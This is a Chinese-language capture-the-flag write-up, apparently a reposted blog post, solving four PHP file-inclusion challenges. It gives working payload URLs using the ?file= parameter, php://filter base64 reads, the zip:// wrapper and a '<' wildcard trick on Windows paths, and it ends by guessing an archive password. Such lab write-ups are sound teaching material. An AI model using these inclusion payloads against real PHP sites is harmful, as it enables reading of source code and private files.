比賽地址:http://39.97.182.97/
這四道考題都是利用的php偽協議 參考php偽協議,利用檔案包含漏洞
第一題:http://watcem.top/wangzhan/27.php
直接構造
http://watcem.top/wangzhan/27.php?file=flag.txt
得到flag
第二題:http://watcem.top/wangzhan/26.php
嘗試構造 http://watcem.top/wangzhan/26.php?file=flag.php
發現需要用base64來解碼
使用php://filter構造
http://watcem.top/wangzhan/26.php?file=php://filter/read=convert.base64-encode/resource=flag.php
得到base64加密過的字串
base64解密得到flag
flag{fa8a8853b970c0f82bda58648ce1292a}
第三題:http://watcem.top/ctf/2/2.php
這題好**難 剛開始做沒思路還是問的大佬才寫出來
題中提示flag在桌面,然后試圖構造桌面路徑
http://watcem.top/ctf/2/2.php?file=C:\Users\Administrator\Desktop\flag.<
之后在頁面上發現回顯,是.7z檔案
注:這里有一個知識點 PHP中的(<) 相當于通配符符號(*)
確定是.7z檔案后,重新構造url
http://watcem.top/ctf/2/2.php?file=zip://C:\Users\Administrator\Desktop\flag.zip%23flag.txt
%23是#,經過轉義在win上就要用%23
得到flag
我好菜阿巴阿巴
第四題:http://watcem.top/ctf/3/3.php
發現頁面是這個,甜甜的檔案- -
2333太甜了
構造 查找在桌面上的含有flag的檔案
http://watcem.top/ctf/3/3.php?file=C:\Users\Administrator\Desktop\flag.<
得到回顯 可以看到l.7z檔案中含有flag.txt文本
再構造,嘗試打開flag.txt
構造一個發現沒反應http://watcem.top/ctf/3/3.php?file=C:\Users\Administrator\Desktop\flag.7z%23flag.txt
試試base64解碼
http://watcem.top/ctf/3/3.php?file=php://filter/convert.base64-encode/resource=file://C:\Users\Administrator\Desktop\flag.7z
頁面下方顯示一串字符~
N3q8ryccAATAe6mrIAAAAAAAAABqAAAAAAAAADAECf7cQ+YDVIG3ANMRbxs5ucbqTnBjZLGyzsSyPyqWlpRLnwEEBgABCSAABwsBAAIkBvEHAQpTB+KCpw0d1h3bISEBAAEADBgUAAgKAbRFbLcAAAUBGQkAAAAAAAAAAAAREwBmAGwAYQBnAC4AdAB4AHQAAAAZABQKAQDAKZRq7KbWARUGAQAgAAAAAAA=
base64解碼發現沒解出來,艸(一種植物)
把他們扔到010editor中,使用DecodeBase64腳本解碼
保存為1.7z 打開發現有密碼
看題上提示是3位數 純數字密碼,隨便試下發現密碼是123,當然也可以爆破 打開flag.txt 得到flag
題太難了,我是five,本人很菜,如果有寫的不對的地方歡迎大佬們評論區留言指正
參考鏈接:https://www.cnblogs.com/-mo-/p/11736445.html
https://blog.csdn.net/qq_41289254/article/details/81388343?utm_source=app
轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/205295.html
標籤:其他
下一篇:實驗一 網路掃描與網路偵察